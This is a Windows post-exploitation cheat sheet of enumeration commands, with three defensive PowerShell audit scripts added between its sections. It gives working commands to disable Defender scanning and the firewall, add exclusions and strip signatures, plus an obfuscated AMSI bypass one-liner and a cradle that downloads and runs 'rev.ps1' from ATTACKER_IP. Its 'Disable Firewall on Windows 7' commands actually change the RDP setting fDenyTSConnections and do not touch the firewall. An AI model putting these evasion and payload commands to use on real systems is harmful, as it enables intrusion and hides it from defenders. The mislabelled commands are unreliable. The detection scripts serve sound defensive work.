Manual Enumeration
1. Windows Version and Configuration
Find installed patches, architecture, OS version:
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Get exact OS version:
type C:\Windows\System32\eula.txt
Extract patches and updates:
wmic qfe
Architecture:
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables:
set
Get-ChildItem Env: | ft Key,Value
List all drives:
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root
2. User Enumeration
Hostname:
hostname
Get current username:
echo %USERNAME% || whoami
$env:username
echo %username%
getuid (inside a Meterpreter session)
List user privilege:
whoami /priv
whoami /groups
List all users:
net user
net users
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements (lockout threshold, password policy); useful before any bruteforcing:
net accounts
Get details about a user (e.g. administrator, admin, the current user):
net user administrator
net user admin
net user %USERNAME%
List all local groups:
net localgroup
Get-LocalGroup|ft Name
Get details about a group (e.g. administrators):
net group /domain
net group /domain {Group Name}
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
On a French-localized system the built-in group is named Administrateurs:
Get-LocalGroupMember Administrateurs | ft Name,PrincipalSource
Get Domain Controllers:
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
3. Network Enumeration
List all network interfaces, IP, and DNS:
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table:
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table:
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
ipconfig /all & route print & arp -a
List all current connections:
netstat -ano
List open connections:
netstat -aton
List all network shares:
net share
Find-DomainShare -ComputerDomain domain.local   (PowerView)
SNMP Configuration:
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
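The commands in sections 1 to 3 are one-off queries. The following PowerShell snapshot-and-diff script is an added example (not part of the original cheat sheet) that captures the same facts from the defender's side (OS build, hotfixes, enabled local users, local administrators, TCP listeners, SMB shares) and compares them with the previous run, so a new local admin, share or listener stands out. The baseline file location under ProgramData is an assumption; the local administrators group is resolved by its well-known SID so the script also works on localized systems where the group is not called "Administrators".

```powershell
# Added example: host baseline snapshot and comparison (not from the original page).
# Requires an elevated Windows PowerShell 5.1+ session with the LocalAccounts,
# NetTCPIP and SmbShare modules (present on Windows 8.1 / Server 2012 R2 and later).

function Get-HostBaseline {
    $os = Get-CimInstance Win32_OperatingSystem
    [pscustomobject]@{
        Host        = $env:COMPUTERNAME
        Taken       = (Get-Date).ToString('s')
        OSVersion   = "$($os.Caption) $($os.Version) $($os.OSArchitecture)"
        Hotfixes    = @(Get-HotFix | Select-Object -ExpandProperty HotFixID | Sort-Object)
        LocalUsers  = @(Get-LocalUser | Where-Object Enabled | Select-Object -ExpandProperty Name | Sort-Object)
        # S-1-5-32-544 is the built-in Administrators group on every locale
        LocalAdmins = @(Get-LocalGroupMember -SID 'S-1-5-32-544' | Select-Object -ExpandProperty Name | Sort-Object)
        Listeners   = @(Get-NetTCPConnection -State Listen |
                        ForEach-Object { "$($_.LocalAddress):$($_.LocalPort)" } | Sort-Object -Unique)
        Shares      = @(Get-SmbShare | Select-Object -ExpandProperty Name | Sort-Object)
    }
}

function Compare-HostBaseline {
    param([pscustomobject]$Old, [pscustomobject]$New)
    $diffs = foreach ($prop in 'Hotfixes', 'LocalUsers', 'LocalAdmins', 'Listeners', 'Shares') {
        # Set difference in both directions; -notcontains also copes with a single
        # string, which is what ConvertFrom-Json returns for a one-element array.
        $added   = @($New.$prop | Where-Object { $Old.$prop -notcontains $_ })
        $removed = @($Old.$prop | Where-Object { $New.$prop -notcontains $_ })
        foreach ($a in $added)   { [pscustomobject]@{ Field = $prop; Change = 'added';   Value = $a } }
        foreach ($r in $removed) { [pscustomobject]@{ Field = $prop; Change = 'removed'; Value = $r } }
    }
    if ($Old.OSVersion -ne $New.OSVersion) {
        $diffs += [pscustomobject]@{ Field = 'OSVersion'; Change = 'changed'; Value = $New.OSVersion }
    }
    return @($diffs)
}

# Assumed baseline location; any path the collecting account can write works.
$BaselinePath = Join-Path $env:ProgramData 'host-baseline.json'

$current = Get-HostBaseline
if (Test-Path -LiteralPath $BaselinePath) {
    $previous = Get-Content -LiteralPath $BaselinePath -Raw | ConvertFrom-Json
    $changes  = Compare-HostBaseline -Old $previous -New $current
    if ($changes.Count -eq 0) { "No changes since $($previous.Taken)" }
    else { $changes | Format-Table -AutoSize }
} else {
    "No previous baseline at $BaselinePath; writing the first one."
}
$current | ConvertTo-Json -Depth 3 | Set-Content -LiteralPath $BaselinePath
```

Run it once to seed the baseline and then on a schedule; an entry such as `LocalAdmins added <name>` or `Listeners added 0.0.0.0:4444` is the kind of change worth an alert. Local group membership changes are also logged by Windows itself (event 4732 in the Security log when auditing is enabled), so the diff is a cross-check rather than a replacement for event log monitoring.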
4. Antivirus & Detections
Enumerate antivirus products registered on the box:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Windows Defender
Check status of Defender:
PS C:\> Get-MpComputerStatus
Disable scanning of all downloaded files and attachments, disable AMSI (reactive):
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
Disable AMSI (set to 0 to enable):
PS C:\> Set-MpPreference -DisableScriptScanning 1
Exclude a folder:
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Remove signatures (if Internet connection is present, they will be downloaded again):
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Firewall
List firewall state and current configuration:
netsh advfirewall firewall dump
or
netsh firewall show state
netsh firewall show config
List firewall's blocked ports:
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall:
Disable Firewall on Windows 7 via cmd:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable Firewall on Windows 7 via Powershell:
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'
Disable Firewall on any Windows version via cmd:
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
How well is the system secured? List installed hotfixes with their install dates:
wmic qfe get Caption,Description,HotFixID,InstalledOn
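Every Defender and firewall change listed above leaves a trace in configuration state or in the operational event log. The script below is an added example (not part of the original page) that audits those traces from the defender's side: it flags disabled real-time/IOAV/script scanning, stale signatures, path and process exclusions (with extra emphasis on exclusions that point at standard-user-writable directories), disabled firewall profiles, and recent Defender events 5001 (real-time protection disabled) and 5007 (configuration changed, which is where new exclusions are recorded). It assumes an elevated session on a host with the Defender and NetSecurity PowerShell modules.

```powershell
# Added example: read-only audit of Defender and firewall tamper indicators.
# Not from the original cheat sheet; uses only Get-* cmdlets, changes nothing.

function Get-DefenderTamperReport {
    $findings = New-Object System.Collections.Generic.List[string]
    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference

    # Engine state as reported by Get-MpComputerStatus
    if (-not $status.AMServiceEnabled)          { $findings.Add('Antimalware service is not running') }
    if (-not $status.AntivirusEnabled)          { $findings.Add('Antivirus is disabled') }
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is disabled') }
    if ($status.AntivirusSignatureAge -gt 7) {
        # MpCmdRun -RemoveDefinitions or a blocked update channel both show up here
        $findings.Add("Signatures are $($status.AntivirusSignatureAge) days old (last update $($status.AntivirusSignatureLastUpdated))")
    }

    # Preferences that Set-MpPreference can flip
    if ($pref.DisableRealtimeMonitoring) { $findings.Add('DisableRealtimeMonitoring is set') }
    if ($pref.DisableIOAVProtection)     { $findings.Add('DisableIOAVProtection is set: downloads and attachments are not scanned') }
    if ($pref.DisableScriptScanning)     { $findings.Add('DisableScriptScanning is set') }

    # Exclusions are blind spots; ones on directories any user can write to are the worst kind
    $userWritable = @('C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Users\Public', 'C:\Temp')
    foreach ($p in @($pref.ExclusionPath)) {
        if (-not $p) { continue }
        $tag = if ($userWritable -contains $p.TrimEnd('\')) { ' [writable by standard users]' } else { '' }
        $findings.Add("Path exclusion: $p$tag")
    }
    foreach ($p in @($pref.ExclusionProcess)) { if ($p) { $findings.Add("Process exclusion: $p") } }

    # Firewall profiles: "netsh advfirewall set allprofiles state off" shows up as Enabled = False
    foreach ($prof in Get-NetFirewallProfile) {
        if (-not $prof.Enabled) { $findings.Add("Firewall profile '$($prof.Name)' is disabled") }
    }

    # Recent Defender operational events: 5001 = real-time protection disabled,
    # 5007 = platform configuration changed (exclusion add/remove lands here)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'
        Id      = 5001, 5007
    } -MaxEvents 20 -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $firstLine = ($e.Message -split "`r?`n")[0]
        $findings.Add("[$($e.TimeCreated)] Event $($e.Id): $firstLine")
    }
    return $findings
}

$report = @(Get-DefenderTamperReport)
if ($report.Count -eq 0) { 'No Defender or firewall deviations found' } else { $report }
```

The 5007 events carry the old and new value of the changed setting in their message, so the first line printed here is enough to see which exclusion or switch was touched; forwarding the same event IDs to a SIEM gives the same visibility fleet-wide without running the script on each host.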
AppLocker Enumeration
Rules pushed by GPO (Group Policy Objects) are stored under:
HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
List AppLocker rules:
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
AppLocker Bypass:
By default, C:\Windows is not blocked, and C:\Windows\Tasks is writable by any user
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
Powershell
Default PowerShell locations on a Windows system:
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
PowerShell Constrained Mode:
Check if we are in constrained language mode:
$ExecutionContext.SessionState.LanguageMode
PowerShdll - PowerShell without powershell.exe, via a DLL:
rundll32.exe C:\temp\PowerShdll.dll,main
Other bypasses:
PS > &{ whoami }
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
AMSI Bypass (Antimalware Scan Interface)
Find more AMSI bypasses: here
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
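The one-liner above splits the identifiers it touches ('Ams'+'iUtils', 'am'+'siInitFailed') precisely so that a plain substring match on "AmsiUtils" in script block logs fails. The script below is an added example (not part of the original page) written from the detection side: it reports the session language mode, whether script block logging is enforced by policy, which AMSI provider CLSIDs are registered, and then scans recent PowerShell 4104 script block events after collapsing that kind of string concatenation, so the well-known AMSI identifiers line up again. It assumes an elevated session on a host that has script block logging turned on; the constructed sample at the end is the page's own one-liner, included so the normalization can be seen working without any event log.

```powershell
# Added example: PowerShell hardening check and AMSI-tamper detection over 4104 events.
# Not from the original cheat sheet. Read-only.

function ConvertTo-NormalizedScript {
    param([string]$Text)
    # 'ab'+'cd' and "ab"+"cd" become abcd; remaining quotes are dropped so that
    # identifiers compare the same no matter how they were split in the source.
    $joined = $Text -replace "['""]\s*\+\s*['""]", ''
    return ($joined -replace "['""]", '')
}

function Find-AmsiTamperPattern {
    param([string]$Text)
    $norm = ConvertTo-NormalizedScript $Text
    foreach ($p in 'AmsiUtils', 'amsiInitFailed', 'AmsiScanBuffer', 'amsiContext') {
        if ($norm.IndexOf($p, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) { return $p }
    }
    return $null
}

function Get-PowerShellHardeningReport {
    $r = [ordered]@{}
    $r.LanguageMode = $ExecutionContext.SessionState.LanguageMode.ToString()

    # Script block logging is enforced by this policy key; without it there are no 4104 events to scan
    $sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    $r.ScriptBlockLoggingByPolicy = [bool]($sbl -and $sbl.EnableScriptBlockLogging -eq 1)

    # AMSI providers register a CLSID subkey here; an empty list means no engine scans script content
    $providers = Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue
    $r.AmsiProviderClsids = @($providers | ForEach-Object { $_.PSChildName })
    return [pscustomobject]$r
}

function Find-AmsiTamperScriptBlocks {
    param([int]$MaxEvents = 500)
    # 4104 = "Creating Scriptblock text", the script block logging event
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $hit = Find-AmsiTamperPattern $e.Message
        if ($hit) {
            $norm = ConvertTo-NormalizedScript $e.Message
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Pattern = $hit
                Snippet = $norm.Substring(0, [Math]::Min(160, $norm.Length)).Replace("`n", ' ')
            }
        }
    }
}

# Constructed sample: the split-identifier one-liner quoted on this page, truncated before SetValue.
$sample = "[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static')"
"Plain substring match on the raw text: $($sample.Contains('AmsiUtils'))"   # the split defeats this
"Match after normalization: $(Find-AmsiTamperPattern $sample)"               # identifier is restored

Get-PowerShellHardeningReport | Format-List
Find-AmsiTamperScriptBlocks | Format-Table -AutoSize
```

A LanguageMode of ConstrainedLanguage for non-admin users (via AppLocker or WDAC) removes the .NET reflection the one-liner relies on, and ScriptBlockLoggingByPolicy = True is what makes the 4104 scan possible in the first place; the normalization is deliberately simple and only undoes quote-splitting, so other obfuscation (format strings, char arrays, encoding) needs its own decoding step.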
Default Writable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
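The AppLocker note above (C:\Windows is allowed by the default rule while C:\Windows\Tasks is writable) and this folder list describe the same gap from two sides: a location under an allowed path that a standard user can write to. The script below is an added example (not part of the original page) that checks, for each listed folder that exists on the host, whether Everyone, Users, Authenticated Users or INTERACTIVE hold write or append rights (resolved by SID so localized group names do not matter), and which effective AppLocker path rules cover that folder, so a defender can see where a deny rule or an ACL change is needed. It assumes an elevated session; the AppLocker part needs the AppLocker module and treats rule paths as simple prefixes, which is enough for the default %WINDIR%\* style rules.

```powershell
# Added example: audit of standard-user-writable folders versus AppLocker path rules.
# Not from the original cheat sheet. Read-only.

# The folder list from this page
$CandidatePaths = @(
    'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
    'C:\Windows\System32\spool\drivers\color', 'C:\Windows\System32\spool\printers',
    'C:\Windows\System32\spool\servers', 'C:\Windows\tracing', 'C:\Windows\Temp',
    'C:\Users\Public', 'C:\Windows\Tasks', 'C:\Windows\System32\tasks', 'C:\Windows\SysWOW64\tasks',
    'C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system',
    'C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system',
    'C:\Windows\debug\wia', 'C:\Windows\registration\crmlog',
    'C:\Windows\System32\com\dmp', 'C:\Windows\SysWOW64\com\dmp',
    'C:\Windows\System32\fxstmp', 'C:\Windows\SysWOW64\fxstmp'
)

# Well-known SIDs: Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE
$BroadSids  = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
$WriteBits  = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'
$GenericRW  = 0x50000000   # GENERIC_ALL (0x10000000) | GENERIC_WRITE (0x40000000), unmapped generic rights

function Test-BroadWriteAccess {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    $writers = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($BroadSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $WriteBits) -ne 0) -or (($rights -band $GenericRW) -ne 0)) {
            $ace.IdentityReference.Value
        }
    }
    [pscustomobject]@{ Path = $Path; Writers = @($writers | Sort-Object -Unique) }
}

# AppLocker path variables expanded for this host
$AppLockerVars = @{
    '%WINDIR%'       = $env:windir
    '%SYSTEM32%'     = Join-Path $env:windir 'System32'
    '%PROGRAMFILES%' = $env:ProgramFiles
    '%OSDRIVE%'      = $env:SystemDrive
}
function Expand-AppLockerPath {
    param([string]$Pattern)
    $out = $Pattern
    foreach ($k in $AppLockerVars.Keys) { $out = $out -ireplace [regex]::Escape($k), $AppLockerVars[$k] }
    return $out
}

function Get-AppLockerCoverage {
    param([string]$Path)
    $policyXml = Get-AppLockerPolicy -Effective -Xml -ErrorAction SilentlyContinue
    if (-not $policyXml) { return }
    $xml = [xml]$policyXml
    foreach ($rule in $xml.SelectNodes('//FilePathRule')) {
        foreach ($cond in $rule.SelectNodes('./Conditions/FilePathCondition')) {
            $pattern = $cond.GetAttribute('Path')
            # Prefix match on the expanded pattern, trailing wildcard and separator removed
            $prefix  = (Expand-AppLockerPath $pattern).TrimEnd('*').TrimEnd('\')
            if (($Path + '\').StartsWith($prefix + '\', [System.StringComparison]::OrdinalIgnoreCase)) {
                '{0} {1} rule "{2}" ({3})' -f $rule.ParentNode.GetAttribute('Type'), $rule.GetAttribute('Action'), $rule.GetAttribute('Name'), $pattern
            }
        }
    }
}

foreach ($p in $CandidatePaths) {
    $r = Test-BroadWriteAccess $p
    if ($null -eq $r -or $r.Writers.Count -eq 0) { continue }   # absent, unreadable, or not broadly writable
    "$($r.Path) is writable by: $($r.Writers -join ', ')"
    $cov = @(Get-AppLockerCoverage $r.Path)
    if ($cov.Count -eq 0) { '    no AppLocker path rule references this location' }
    else { $cov | ForEach-Object { "    $_" } }
}
```

A folder that prints as writable and covered only by an Exe/Script Allow rule is the combination the bypass list above relies on; the usual fixes are a Deny path rule for that folder (or a publisher/hash allow policy instead of path rules) and, where the write access is not needed, tightening the ACL.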